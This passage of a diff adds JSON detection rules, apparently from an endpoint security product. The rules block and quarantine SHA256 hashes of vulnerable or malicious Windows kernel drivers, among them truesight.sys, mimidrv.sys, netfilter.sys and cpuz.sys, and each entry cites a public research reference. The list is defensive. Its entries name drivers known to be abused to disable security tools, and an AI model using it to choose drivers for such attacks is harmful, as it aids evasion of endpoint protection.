"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486074Z", + "creation_date": "2026-03-23T11:45:31.486077Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486087Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f082d6c315906e10e06d2da9ba3b15396935c74e68b26f34cc026121e540b7a9", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dee09683-3d9f-53cf-b209-70207d8b7774", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817607Z", + "creation_date": "2026-03-23T11:45:31.817610Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817618Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6b6157234e63a145e4cbdb4b3236ab3daf40814a723ba8cc83c1156cc70a6f0c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dee6556d-b7e7-5038-83b3-d472ba9ec229", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:31.150651Z", + "creation_date": "2026-03-23T11:45:31.150653Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150659Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "025664833087b5a79110ffeb655a9f3eedbcb1ef737959bdbd7c3f4ff9c15245", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "def2807f-9961-5726-97b6-58cd446f291c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972646Z", + "creation_date": "2026-03-23T11:45:29.972648Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972653Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "485f3a67b826928c1f2d6ba7437b02d42c1b55a6511b521deb9a36aeb304ef98", + "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) 
[https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "def333ff-4b60-51b6-8bd6-5b0b3868d735", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159728Z", + "creation_date": "2026-03-23T11:45:31.159730Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159740Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0eb7b71fe375b12475c29a427fe9b6cc1cb6608aa42b941e5df62a3db674473b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "def35c13-bb3a-5b8f-a1af-3b7edd6b53cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831458Z", + "creation_date": "2026-03-23T11:45:30.831460Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831466Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e77d67300df62b68912b851a1570d1706f5ef7214f340dacc9b183593995337e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "defbb607-2629-550d-9a44-ec1bb262ab14", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474450Z", + "creation_date": "2026-03-23T11:45:31.474454Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474464Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a9c34e35292bdbf1e112d13955a83548a9e6d0c907f8232a3caf2162cc20006b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "deff8520-d81a-5d94-b8d7-237c5936132a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474747Z", + "creation_date": "2026-03-23T11:45:31.474751Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474761Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b72696370157b9ed2aa2cbed958b66836d4fc13099464cfc0e6758607961df19", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "df14440a-0095-5fce-9278-bb91178899be", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827455Z", + "creation_date": 
"2026-03-23T11:45:31.827458Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827466Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8384f1b5b1e9dacbe78d329d5787f0ca8f10be035b796e9d19f7d81a9e3abacd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "df1c70b3-fa68-5d00-8a2a-9e32eb2bdde0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620675Z", + "creation_date": "2026-03-23T11:45:29.620677Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620682Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "845f1e228de249fc1ddf8dc28c39d03e8ad328a6277b6502d3932e83b879a65a", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"df1c759c-8020-5f3e-b563-0f63270bd453", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486499Z", + "creation_date": "2026-03-23T11:45:31.486502Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486509Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5bd0dc24102711f8c41cfa7299a2ab606224a8d52acf2a3cb9f7fc3d8102a8ff", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "df24868d-9e99-56ad-b279-4762de15c020", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967316Z", + "creation_date": "2026-03-23T11:45:29.967319Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.967327Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4a229ab274e364df92cc46ecbc9faab32f7b0955dab982658313f2faf9410863", + "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "df25a7b9-69a4-5e60-836f-f942c3d85338", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982050Z", + "creation_date": "2026-03-23T11:45:29.982052Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982058Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea0b9eecf4ad5ec8c14aec13de7d661e7615018b1a3c65464bf5eca9bbf6ded3", + "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/b03798af-d25a-400b-9236-4643a802846f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "df347e10-0d1a-5575-9b71-125ceafd1e96", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818548Z", + "creation_date": "2026-03-23T11:45:31.818551Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818559Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aaadfbe909aaa736fcd05fc1c93653adf03f538f4a86a99c90aaabf00db193dc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "df373da0-6a43-5d5d-8ed6-9a81a506b462", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831937Z", + "creation_date": "2026-03-23T11:45:30.831939Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831952Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"30c4bba32e37c9e23f2852a1f4ee2d932add867138b59a91ee0636d158d107c0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "df40da13-7216-542f-9129-8f5f25493d44", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476306Z", + "creation_date": "2026-03-23T11:45:31.476310Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476320Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9ec7885c15536e216bf07925bd8251e034a91ccec52867bb306e7634f735aa48", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "df4302e7-87cd-5644-86db-58509df0c1b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494140Z", + "creation_date": "2026-03-23T11:45:31.494143Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494152Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b67eb9bd456204bab6446c08d31a86fd4bf02da67a52c12d99e9d5630b270c23", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "df57b911-233f-59be-95fd-074466828d63", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144652Z", + "creation_date": "2026-03-23T11:45:32.144654Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144659Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "345ebed68c4e68aff5dd14c8df8524b69db4793845ca814bded608b246077792", + "comment": "Malicious Kernel Driver (aka driver_099ef491.sys) 
[https://www.loldrivers.io/drivers/2ba1bccf-d8d7-464a-9ae1-41371c55e5e8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "df757311-db0d-5aa8-b32d-5fbc13ebd824", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827993Z", + "creation_date": "2026-03-23T11:45:30.827996Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828001Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9a18654cf0bfa5223405493e42c4fca89a376ed06e6606d4339c951a5066c908", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "df770ca9-9ebe-505d-8ae1-2c0547490072", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834520Z", + "creation_date": 
"2026-03-23T11:45:30.834524Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834533Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9e9c01d8717c3286edcd0fedc862570071be89947d2eb04eadd106a308a42709", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "df816063-520d-5938-abd2-83299c06d939", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472752Z", + "creation_date": "2026-03-23T11:45:31.472756Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472765Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6e013f794babd59b9703ac2d199beb1d91a5c2908b30ba4ef60a6e4f12a5e8cd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "df850812-e935-54cf-9aa4-752a31d006e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462764Z", + "creation_date": "2026-03-23T11:45:30.462767Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462776Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "af4f42197f5ce2d11993434725c81ecb6f54025110dedf56be8ffc0e775d9895", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dfa4b45d-a628-5a53-b344-c7628f177973", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494510Z", + "creation_date": "2026-03-23T11:45:31.494512Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494518Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5406ab98add13a7d31161488cdf92e910caf97be72122167898a3d6115d73a4a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dfaffc60-7408-5454-ac5e-fa6f78673c1c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472752Z", + "creation_date": "2026-03-23T11:45:30.472756Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472777Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b9695940f72e3ed5d7369fb32958e2146abd29d5895d91ccc22dfbcc9485b78b", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "dfb4f748-09ee-5f59-bd03-a308c2c388ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
